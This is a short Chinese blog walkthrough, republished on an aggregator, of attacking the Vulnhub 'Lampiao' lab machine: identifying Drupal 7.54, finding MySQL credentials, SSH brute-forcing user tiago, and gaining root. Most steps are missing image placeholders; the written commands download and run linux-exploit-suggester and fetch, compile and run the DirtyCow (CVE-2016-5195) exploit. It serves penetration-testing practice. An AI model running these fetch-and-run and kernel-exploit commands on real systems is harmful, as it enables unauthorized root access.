当前位置: 代码迷 >> 综合 >> Vulnhub靶机 Lampiao
  详细解决方案

Vulnhub靶机 Lampiao

热度:18   发布时间:2023-12-03 13:24:09.0

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

找到登录页面
cms:drupal7
可以爆破用户名

先找一下漏洞试试

在这里插入图片描述

伐克
尝试了半天
发现版本是7.54
用了半天7.0-7.31的

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述在这里插入图片描述

在这里插入图片描述

找到mysql的账号

在这里插入图片描述
在这里插入图片描述

三个账号
没能解密任何一个
试一下ssh
失败了
root就在你眼前
就是没法提权的感觉
太酸爽了
在这里插入图片描述

有一个用户tiago
ssh爆破

在这里插入图片描述
在这里插入图片描述

我*********他
密码是这个??????
我*********

$ wget -q -O /tmp/linux-exploit-suggester.sh https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh
$ chmod +x /tmp/linux-exploit-suggester.sh
$ /tmp/linux-exploit-suggester.sh
...
[+] [CVE-2016-5195] dirtycow 2Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetailsTags: debian=7|8,RHEL=5|6|7,[ ubuntu=14.04|12.04 ],ubuntu=10.04{
    kernel:2.6.32-21-generic},ubuntu=16.04{
    kernel:4.4.0-21-generic}Download URL: https://www.exploit-db.com/download/40839ext-url: https://www.exploit-db.com/download/40847.cppComments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh$ wget -q -O /tmp/40847.cpp https://www.exploit-db.com/download/40847.cpp
$ g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
$ ./dcow -s

内核提权
上面那个脚本挺好用的
建议收藏